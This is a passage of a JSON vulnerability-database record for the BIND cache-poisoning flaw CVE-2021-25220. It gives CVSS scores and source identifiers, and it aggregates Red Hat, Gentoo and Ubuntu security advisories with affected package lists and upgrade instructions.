"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.3,
"id": "CVE-2021-25220",
"impactScore": 4.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2022-001797",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-25220",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-officer@isc.org",
"id": "CVE-2021-25220",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-25220",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-1514",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-25220",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"description": {
"_id": null,
"data": "BIND 9.11.0 -\u003e 9.11.36 9.12.0 -\u003e 9.16.26 9.17.0 -\u003e 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -\u003e 9.11.36-S1 9.16.8-S1 -\u003e 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients. Bogus NS records supplied by the forwarders may be cached and used by name if it needs to recurse for any reason. This issue causes it to obtain and pass on potentially incorrect answers. (CVE-2021-25220)\nBy flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver\u0027s performance, effectively denying legitimate clients access to the DNS resolution service. (CVE-2022-2795)\nBy spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38177)\nBy spoofing the target resolver with responses that have a malformed EdDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38178). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: bind security update\nAdvisory ID: RHSA-2023:0402-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0402\nIssue date: 2023-01-24\nCVE Names: CVE-2021-25220 CVE-2022-2795\n====================================================================\n1. Summary:\n\nAn update for bind is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly. \n\nSecurity Fix(es):\n\n* bind: DNS forwarders - cache poisoning vulnerability (CVE-2021-25220)\n\n* bind: processing large delegations may severely degrade resolver\nperformance (CVE-2022-2795)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064512 - CVE-2021-25220 bind: DNS forwarders - cache poisoning vulnerability\n2128584 - CVE-2022-2795 bind: processing large delegations may severely degrade resolver performance\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nppc64:\nbind-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm\n\nppc64le:\nbind-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm\n\ns390x:\nbind-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.s390x.rpm\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm\n\nppc64le:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm\n\ns390x:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-25220\nhttps://access.redhat.com/security/cve/CVE-2022-2795\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY9AIs9zjgjWX9erEAQiz9BAAiQvmAQ5DWdOQbHHizPAHBnKnBtNBfCT3\niaAzKQ0Yrpk26N9cdrvcBJwdrHpI28VJ3eemFUxQFseUqtAErsgfL4QqnjPjQgsp\nU2qLPjqbzfOrbi1CuruMMIIbtxfwvsdic8OB9Zi7XzfZjWm2X4c6Ima+QXol6x9a\n8J2qdzCqhoYUXJgdpVK9nAAGsPtidcnqLYYIcTclJArp6uRSlEEk7EbNJvs2SAbj\nMUo5aq5BoVy2TkiMyqhT5voy6K8f4c7WbQYerNieps18541ZSr29fAzWBznr3Yns\ngE10Aaoa8uCxlaexFR8EahPVYe6wJAm6R62LBabEWChbzW0oxr7X2DdzX9eiOwl0\nwJT0n4GHoFsCGMa+v1yybkjHIUfiW25WC7bC4QDj4fjTpbicVlnttXhQJwCJK5bb\nPC27GE6qi7EqwHYJa/jPenbIG38mXj/r2bwIr1qYQMLjQ8BQIneShky3ZWE4l/jd\nzTMwGVal8ACBYdCALx/O9QNyzaO92xHLnKl3DIoqaQdjasIfGp/G6Xc1YggKyZAP\nVVtXPiOIbReBVNWiBXMH1ZEQeNon4su0/MbMWrmJpwvEzYeXkuWO98LZ4dlLVuim\nNG/dJ6RqzT6/aqRNVyOt5s4SLIQ5DrPXoPnZRUBsbpWhP6lxPhESKA0TUg5FYz33\neDGIrZR4jEY=azJw\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 9) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress. The dhcp packages provide a relay agent and ISC DHCP service\nrequired to enable and administer DHCP on a network. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-25\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Low\n Title: ISC BIND: Multiple Vulnerabilities\n Date: October 31, 2022\n Bugs: #820563, #835439, #872206\n ID: 202210-25\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been discovered in ISC BIND, the worst of\nwhich could result in denial of service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-dns/bind \u003c 9.16.33 \u003e= 9.16.33\n 2 net-dns/bind-tools \u003c 9.16.33 \u003e= 9.16.33\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in ISC BIND. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll ISC BIND users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-9.16.33\"\n\nAll ISC BIND-tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-tools-9.16.33\"\n\nReferences\n==========\n\n[ 1 ] CVE-2021-25219\n https://nvd.nist.gov/vuln/detail/CVE-2021-25219\n[ 2 ] CVE-2021-25220\n https://nvd.nist.gov/vuln/detail/CVE-2021-25220\n[ 3 ] CVE-2022-0396\n https://nvd.nist.gov/vuln/detail/CVE-2022-0396\n[ 4 ] CVE-2022-2795\n https://nvd.nist.gov/vuln/detail/CVE-2022-2795\n[ 5 ] CVE-2022-2881\n https://nvd.nist.gov/vuln/detail/CVE-2022-2881\n[ 6 ] CVE-2022-2906\n https://nvd.nist.gov/vuln/detail/CVE-2022-2906\n[ 7 ] CVE-2022-3080\n https://nvd.nist.gov/vuln/detail/CVE-2022-3080\n[ 8 ] CVE-2022-38177\n https://nvd.nist.gov/vuln/detail/CVE-2022-38177\n[ 9 ] CVE-2022-38178\n https://nvd.nist.gov/vuln/detail/CVE-2022-38178\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-25\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. ==========================================================================\nUbuntu Security Notice USN-5332-1\nMarch 17, 2022\n\nbind9 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Bind. \n\nSoftware Description:\n- bind9: Internet Domain Name Server\n\nDetails:\n\nXiang Li, Baojun Liu, Chaoyi Lu, and Changgen Zou discovered that Bind\nincorrectly handled certain bogus NS records when using forwarders. A\nremote attacker could possibly use this issue to manipulate cache results. \n(CVE-2021-25220)\n\nIt was discovered that Bind incorrectly handled certain crafted TCP\nstreams. A remote attacker could possibly use this issue to cause Bind to\nconsume resources, leading to a denial of service. This issue only affected\nUbuntu 21.10. (CVE-2022-0396)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n bind9 1:9.16.15-1ubuntu1.2\n\nUbuntu 20.04 LTS:\n bind9 1:9.16.1-0ubuntu2.10\n\nUbuntu 18.04 LTS:\n bind9 1:9.11.3+dfsg-1ubuntu1.17\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-25220"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-25220",
"trust": 4.0
},
{
"db": "SIEMENS",
"id": "SSA-637483",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-22-258-05",
"trust": 1.5
},
{
"db": "JVN",
"id": "JVNVU99475301",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU98927070",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU92488108",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-105-08",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170724",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169894",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169846",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169773",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169587",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.1150",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5750",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4616",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1223",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1289",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2694",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1183",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1160",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032124",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031701",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031728",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166356",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-25220",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169745",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166354",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"id": "VAR-202203-0664",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.20766129
},
